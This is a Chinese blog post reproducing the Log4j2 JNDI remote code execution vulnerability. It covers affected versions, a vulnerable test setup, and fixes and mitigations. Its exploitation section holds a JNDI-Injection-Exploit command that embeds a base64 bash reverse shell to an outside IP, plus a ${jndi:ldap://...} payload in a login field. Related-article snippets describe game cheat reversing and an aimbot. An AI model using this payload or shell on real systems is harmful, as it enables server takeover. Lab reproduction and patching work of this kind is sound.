(工具记录)Log4j2_RCE

news/2024/4/17 2:01:59

 0x00 简介

        ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。

0x01 漏洞概述

        该漏洞是由于Apache Log4j2某些功能存在递归解析功能,未经身份验证的攻击者通过发送特定恶意数据包,可在目标服务器上执行任意代码。

0x02 影响范围

Apache Log4j 2.x <= 2.15.0-rc1

0x03 环境搭建

https://github.com/dbgee/log4j2_rce/releases/download/0.0.1/log4j2_rce-0.0.1.jar

1、该测试环境使用log4j2.8.1版本,在影响范围内

<!-- log4j2核心包 -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.8.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.8.1</version>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>org.springframework.boot</groupId>
<artifactId>spring-boot-maven-plugin</artifactId>
</plugin>
</plugins>
</build>
</project>

0x04 漏洞利用

1、使用JNDI-Injection-Exploit便捷地生成恶意class,其中base64内容即命令

java -jar JNDI-Injection-Exploit-1.0.jar -C "bash -c {echo,YmFzaCAtaSA+IC9kZXYvdGNwLzQ1LjguMTQ2LjI5Lzg4ODggMD4mM==}|{base64,-d}|{bash,-i}" -A  "Your IP"

 2、发送对应情况的payload到测试环境

{"username":"${jndi:ldap://your ip:1389/wbzkx8}",
"password":"123"}

如果和我一样写的反弹shell命令,即可反弹shell成功

 0x05 修复方式 

目前,Apache官方已发布新版本完成漏洞修复,建议用户尽快进行自查,并及时升级至最新版本:

https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2

建议同时采用如下临时措施进行漏洞防范:

1)添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;

2)在应用classpath下添加log4j2.component.properties配置文件,文件内容为log4j2.formatMsgNoLookups=true;

3)JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;

4)部署使用第三方防火墙产品进行安全防护。

链接:

GitHub - dbgee/log4j2_rce: log4j2 rce、poc

GitHub - welk1n/JNDI-Injection-Exploit: JNDI注入测试工具(A tool which generates JNDI links can start several servers to exploit JNDI Injection vulnerability,like Jackson,Fastjson,etc)


http://www.ppmy.cn/news/846417.html

相关文章

【游戏逆向】FPS游戏玩家对象数据分析

目标(Objective) Ÿ Health Ÿ Rifle Ammo Ÿ Pistol Ammo Ÿ Player Pointer 0x01 玩家健康 查找玩家健康值&#xff0c;玩家健康值是100&#xff0c;但是我们并不知道数值类型&#xff0c;我们可以使用精确搜索方式搜索100-所有类型 CE搜索 结果很多&#xff0c;我们…

浅谈相机<2>实际相机选型

浅谈相机<2> 实际摄像头选型 前言摄像头选型感光元器件选型焦距选型 后言参考资料 前言 近来有两次摄像头选购经历&#xff0c;一次选购工业摄像头&#xff0c;另外一次是免驱摄像头&#xff0c;两次过程也出现了一下幺蛾子&#xff1b;特别是第一次&#xff0c;因为我这…

【游戏逆向】FPS游戏自瞄追踪及原理算法

FPS类游戏的自瞄和爆头效果看起来很奇妙&#xff0c;但实际情况下&#xff0c;算法却并不难&#xff0c;而且该功能也不算变态功能&#xff0c;只不过是通过内存数据计算出精准的准星朝向&#xff0c;我们知道计算器的计算速度&#xff0c;一个精确的角度而已&#xff0c;那么自…

基于YOLOv5的FPS类游戏瞄准辅助(附可用于CSGO的模型)

本文来自作者去年写的一个小项目&#xff0c;项目使用YOLOv5-2.0和PyTorch&#xff0c;实现了一款基于目标检测算法的射击类游戏瞄准辅助&#xff0c;俗称“AI外挂”。&#xff08;文中含项目地址及演示视频&#xff0c;项目中提供了作者预训练的可用于CSGO的模型。&#xff09…

FPS手游逆向分析--------矩阵的精确定位

2.1精确定位矩阵 通过上述步骤 我们找到了矩阵&#xff0c;但矩阵确会在每次打开游戏后由于内存的分配而重新加载&#xff0c;如何实现自动寻找矩阵便是我们要考虑的问题 2.1.1通过特征码定位矩阵 所谓特征码就是总出现在变动值附近的不变动的值 与上文的通用特征码不同 定…

ZED2相机+NVIDIA NX使用及检测目标功能1

ZED相机使用 zed ros wrapper分为三部分&#xff1a; zed-ros-wrapper : 提供 ZED ROS Wrapper 节点的主包zed-ros-interfaces&#xff1a;声明自定义主题、服务和操作的包zed-ros-examples&#xff1a;一个支持包&#xff0c;包含有关如何使用 ZED ROS Wrapper 的示例和教程…

浅析相机FOV

文章目录 什么是FOV?HFOV, VFOV, DFOVDFOV如何转换成HFOV和VFOV? 最近试了很多sensor, 每次在选镜头时都对其提到的FOV参数一头雾水。不同的sensor要配不同的镜头&#xff0c;而不同的镜头由于焦距的不同&#xff0c;FOV也不一样。这其中有什么联系呢&#xff1f;FOV又分为HF…

ZED2相机+NVIDIA NX使用及检测目标功能2

在nx结合zed相机&#xff0c;使用yolo进行物体识别 1.venv虚拟环境安装 由于设备自带的python为python2.7环境&#xff0c;所以先创建虚拟环境并激活 sudo apt-get install software-properties-common sudo apt install python3.6(可用存储库管理) sudo aptitude install py…

QT实现按钮开关Form窗体的效果

实现效果叙述如下&#xff1a; MainWindow中的按钮实现Form窗体的开关&#xff0c;Form窗体的关闭按钮禁用掉&#xff0c;只允许使用窗体按钮进行&#xff0c;且关闭MainWindow按钮时Form窗体随之关闭。 注意&#xff1a; 要想实现关闭MainWindow按钮时Form窗体随之关闭&#x…

U盘量产操作工具包,包含4k对齐,ChipGenius等U盘量产工具

要进行U盘量产操作&#xff0c;需要使用专业的U盘量产工具。以下是U盘量产的一般步骤&#xff1a; 下载并安装U盘量产工具。比较常用的U盘量产工具有ChipGenius、U盘启动盘制作工具等。 使用U盘连接电脑&#xff0c;并打开U盘量产工具。 在U盘量产工具中&#xff0c;选择需要…

小米6没有开启位置服务器,小米6gps在哪打开

大家好&#xff0c;我是时间财富网智能客服时间君&#xff0c;上述问题将由我为大家进行解答。 小米6gps打开的位置是&#xff1a; 1、进入手机设置界面&#xff0c;找到“更多设置”&#xff0c;在“更多设置”中找到系统安全选项。 2、点击位置信息&#xff0c;点击“开启位置…

小米服务组件是什么东西_小米10至尊纪念版都有哪些绝活 | 小米推出的服务超大杯又是什么?...

随着今年手机“超大杯”之间的较量也更加激烈。小米也在今年发力高端市场&#xff0c;并取得了不错的成绩。来看看小米今年的“超大杯”&#xff0c;都有哪些“绝活”。 小米10至尊纪念版 绝活一&#xff1a;120Hz刷新率AMOLED屏幕 除了苹果&#xff0c;安卓旗舰普遍支持高刷屏…

小米5无限搭配加无服务器,配置全面拓展小米5支持NFC和HiFi

虽然骁龙820已经完成了它在亚洲的首秀&#xff0c;但传说中作为骁龙820首发大热门之一的小米5却仍旧是若隐若现&#xff0c;难辨其踪。不过&#xff0c;除了难辨真假的外观设计以外&#xff0c;小米5的部分配置正在一点一点的泄露出来。从最新曝光的一份银联“闪付”支持设备列…

小米预装鸿蒙,华为P50Pro将于5月份发布,预装鸿蒙系统,拍照剑指小米11Ultra!...

时间过得飞快&#xff0c;转眼间已经到了4月份&#xff0c;与此同时在各方媒体的不断披露之下&#xff0c;关于华为P50 Pro的消息也是多了起来&#xff0c;根据近期多位博主的爆料&#xff0c;作为华为上半年主打的高端旗舰&#xff0c;华为P50 Pro将于5月份发布&#xff0c;可…

小米Android12,小米神速更新安卓12,三大亮点抢先看!

创作立场声明&#xff1a;个人看法&#xff0c;不喜勿喷 5月18日凌晨&#xff0c;谷歌正式发布了Android 12&#xff0c;值得注意的是&#xff0c;谷歌话音刚落&#xff0c;小米的更新就来了。 据小米官方表示&#xff0c;小米11、小米11 Pro、小米11 Ultra和红米K40 Pro将率先…

小米6X计算机在后台程序无法关闭,小米6怎么关闭后台程序教程

小米6怎么关闭后台程序呢?相信很多用户可能对于小米6如何关闭后台程序的还不太清楚&#xff0c;下面&#xff0c;统一小编来跟大家分享一下小米6关闭后台程序的教程&#xff0c;感兴趣的可以过来看一下。 两种方法&#xff1a; 1、长按主页键2秒&#xff0c;会跳出近期及正在运…

windows安装gitlab-runner提交gitlab自动打包maven包

运行环境&#xff1a; 私服gitlab,想使用gitlab的ci/cd自动打包&#xff0c;不需要将打好的包部署到远程服务器而是保存在本地的&#xff0c;可以在本地安装gitlab-runner,打好的包直接在本地生成 本地是window环境 1 本地安装maven https://maven.apache.org/download.cgi …

gitlab:(二)gitlab添加win10 台式机的ssh key

当前gitlab版本为12系列&#xff1a; 点击settings 找到ssh keys &#xff0c;再找到“ generate one or use an existing key.” 点击 generate one 参考如下的教程&#xff1a; window cmd 命令行示例 添加 ssh keys 添加的效果

家庭视频监控方案

早期说起视频监控&#xff0c;一般指的是行业监控&#xff0c;例如银行&#xff0c;公安这类部门&#xff0c;家庭使用监控设备很少&#xff0c;随着信息技术的发展&#xff0c;人们居住环境的改善&#xff0c;经济发展带来的需求&#xff0c;人们对自身&#xff0c;家庭的安全…

免费内网穿透远程访问家里的监控

在现代生活中&#xff0c;很多场景都会用到监控设备&#xff0c;但也不是所有场景都需要用到专业且昂贵的监控报警系统&#xff0c;更多的场景只是简单的在家用电脑中连接一个摄像头&#xff0c;进行简单的观察和录像功能&#xff0c;这样的简单监控系统通常不具备远程实时访问…
最新文章